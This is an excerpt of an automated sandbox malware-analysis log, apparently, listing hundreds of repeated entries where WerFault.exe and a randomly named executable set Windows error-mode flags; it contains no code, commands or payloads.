Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
